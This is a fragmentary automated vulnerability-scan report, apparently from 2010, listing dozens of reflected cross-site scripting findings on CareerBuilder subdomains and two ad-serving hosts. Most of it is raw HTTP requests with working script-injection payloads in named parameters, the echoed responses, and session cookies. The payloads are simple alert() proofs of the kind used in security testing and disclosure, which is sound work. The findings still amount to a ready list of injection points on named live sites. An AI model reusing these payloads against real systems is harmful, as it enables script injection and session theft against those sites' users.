<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5351db'-alert(1)-'2f09466539d&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21130"%20a%3db%2066d099a642a was submitted in the lr parameter. This input was echoed as 21130" a=b 66d099a642a in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a521130"%20a%3db%2066d099a642a&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196807
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 23:26:58 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7fe5'-alert(1)-'9425161b70b was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ac.ic/Florida_Miami/?lr=cbcb_mha7fe5'-alert(1)-'9425161b70b&SiteID=cbcb_mh030 HTTP/1.1
Host: admin-clerical.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 198212
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=c17e999a751943249031889b774a0aec-343070737-R4-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B96FA49ADD94120890BA6EE7DBBB0B70BB73D4A957DF1B40E37136B4E087C94A7205966FE434239F; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:37 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:37 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL4
Date: Sun, 14 Nov 2010 22:25:37 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mha7fe5'-alert(1)-'9425161b70b&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8bf"%20a%3db%2039cb7791456 was submitted in the lr parameter. This input was echoed as 5f8bf" a=b 39cb7791456 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ac.ic/Florida_Miami/?lr=cbcb_mh5f8bf"%20a%3db%2039cb7791456&SiteID=cbcb_mh030 HTTP/1.1
Host: admin-clerical.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197140
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=f66d76a56e6c49c092e6c437b5f1f0f0-343070714-RT-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650F8EA9F59001F10D230B0487CBA3492F4EAD435A55C0CBCAA310FAAEC46756DA0F487A1EAD80AC621; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:13 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:14 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL29
Date: Sun, 14 Nov 2010 22:25:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload e2b91<script>alert(1)</script>b3f2b434e17 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?placementId=20482&pid=589757e2b91<script>alert(1)</script>b3f2b434e17&ps=-1&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1
Host: ads.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:25:32 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Content-Length: 2497
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=975
Connection: Keep-Alive
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "589757e2b91<script>alert(1)</script>b3f2b434e17"
The value of the placementId request parameter is copied into an HTML comment. The payload ad013--><script>alert(1)</script>679fce7bb3e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?placementId=20482ad013--><script>alert(1)</script>679fce7bb3e&pid=589757&ps=-1&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1
Host: ads.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "20482ad013--><script>alert(1)</script>679fce7bb3e" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload b8db5--><script>alert(1)</script>6b2d12adfe5 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?placementId=20482&pid=589757&ps=-1b8db5--><script>alert(1)</script>6b2d12adfe5&zw=160&zh=626&url=http%3a%2f%2fwww.careerbuilder.com%2f%3flr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26ff%3d21%2fJobSeeker%2fJobs%2fJobResults.aspx%3fArgURL%3d%2fag.ic%2fFlorida_Miami%26lr%3dcbcb_mhf48aa'-alert(1)-'9d78db8d0a5%26argv0%3dFlorida_Miami%26SiteID%3dcbcb_mh031%26%26strcrit%3dQID%3dA3853799236048%3bst%3da%3buse%3dALL%3bTID%3d0%3bCTY%3dMiami%3bSID%3dFL%3bCID%3dUS%3bENR%3dNO%3bDTP%3dDRNS%3bYDI%3dYES%3bIND%3dALL%3bPDQ%3dAll%3bPDQ%3dAll%3bPAYL%3d0%3bPAYH%3dgt120%3bPOY%3dNO%3bETD%3dALL%3bRE%3dALL%3bMGT%3dDC%3bSUP%3dDC%3bFRE%3d30%3bCHL%3dag%3bQS%3dsid_unknown%3bSS%3dNO%3bTITL%3d0%3bOB%3d-modifiedint%3bRAD%3d30%3bJQT%3dRAD%3bJDV%3dFalse%3bExpHigh%3dgt50%3bExpLow%3d0%3bMaxLowExp%3d-1&v=5 HTTP/1.1
Host: ads.adsonar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-1b8db5--><script>alert(1)</script>6b2d12adfe5" -->
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 999f7"><script>alert(1)</script>20cb6235d4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.55. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403936%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d20"><script>alert(1)</script>056827e3655 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4831c><script>alert(1)</script>dcd50598372 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede1a"><script>alert(1)</script>a305855cafa was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5684d"><script>alert(1)</script>3285b7241f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403940%7C0%7C225%7CADTECH [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd61c"><script>alert(1)</script>6e12a239d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 68f0e><script>alert(1)</script>1c8ca3d61d3 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>367d4ee1dd was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5747e"><script>alert(1)</script>99dd4217e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.63. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403944%7C0%7C170%7CADTECH [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 719d3"><script>alert(1)</script>50f3b928662 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22e4"><script>alert(1)</script>e1024253c05 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a3ae0><script>alert(1)</script>ce43ade6607 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40453"><script>alert(1)</script>7fbb26c9a98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.67. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403971%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 669cd"><script>alert(1)</script>17dfe9ed23c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 23a02><script>alert(1)</script>84b2b0ffe6a was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac568"><script>alert(1)</script>445b737e7e was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df345"><script>alert(1)</script>bd058dcb6b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.71. http://adserver.adtechus.com/adiframe%7C3.0%7C5310.1%7C1403973%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62c2"><script>alert(1)</script>47db9872ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2786"><script>alert(1)</script>40b84c3f202 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload cf8d5><script>alert(1)</script>1317b9c8006 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce18d"><script>alert(1)</script>d45c1675446 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403936|0|225|ADTECHce18d"><script>alert(1)</script>d45c1675446 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233
2.75. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403936|0|225|ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe|3.0|5310.1|1403936|0|225|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45421"><script>alert(1)</script>36b2f6b585b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH?45421"><script>alert(1)</script>36b2f6b585b=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a09"><script>alert(1)</script>28c78281f47 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]e3a09"><script>alert(1)</script>28c78281f47 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2fd4c><script>alert(1)</script>bc913fe8b87 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403936|0|225|ADTECH;target=2fd4c><script>alert(1)</script>bc913fe8b87 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6c42"><script>alert(1)</script>e423f98986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403940|0|225|ADTECHd6c42"><script>alert(1)</script>e423f98986 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232
2.79. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403940|0|225|ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe|3.0|5310.1|1403940|0|225|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d43f"><script>alert(1)</script>1c76bda1778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH?6d43f"><script>alert(1)</script>1c76bda1778=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f2a6f><script>alert(1)</script>8e8573dfda4 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH;target=f2a6f><script>alert(1)</script>8e8573dfda4 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd610"><script>alert(1)</script>29d106ecc94 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403940|0|225|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]cd610"><script>alert(1)</script>29d106ecc94 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4437"><script>alert(1)</script>433a8f59407 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403944|0|170|ADTECHb4437"><script>alert(1)</script>433a8f59407 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233
2.83. http://adserver.adtechus.com/adiframe|3.0|5310.1|1403944|0|170|ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe|3.0|5310.1|1403944|0|170|ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da704"><script>alert(1)</script>a7fa24a3079 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH?da704"><script>alert(1)</script>a7fa24a3079=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 236
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e7f4a><script>alert(1)</script>713a8b0ffb8 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH;target=e7f4a><script>alert(1)</script>713a8b0ffb8 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 278
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a402"><script>alert(1)</script>c6499242c01 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403944|0|170|ADTECH;target=_blank;kvg=528;kvi=US_FL;grp=[36993428]7a402"><script>alert(1)</script>c6499242c01 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 282
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be529"><script>alert(1)</script>32ccf94e922 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe|3.0|5310.1|1403971|0|154|ADTECHbe529"><script>alert(1)</script>32ccf94e922 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CDC83886E651A45E171CE41F000F262;
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 233
